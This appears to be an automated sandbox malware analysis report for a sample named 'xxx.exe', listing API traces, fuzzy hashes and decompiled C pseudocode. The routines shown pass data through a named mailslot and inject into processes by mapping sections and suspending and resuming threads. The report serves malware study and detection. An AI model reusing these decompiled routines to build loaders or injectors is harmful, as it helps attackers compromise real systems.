    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name: d3d8sext.exe
Process MD5: 9D985C429B23E924BB4D4ED98778EBBA
Total matches: 141
Initial Analysis Report: Open
Initial sample Analysis ID: 67745
Initial sample SHA 256: FF82DDBE1E173EA08DFE5177913F9AFF88BF3CCC092DFCD2F93AD64AF37810C2
Initial sample name: xxx.exe

Similar Executed Functions

Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
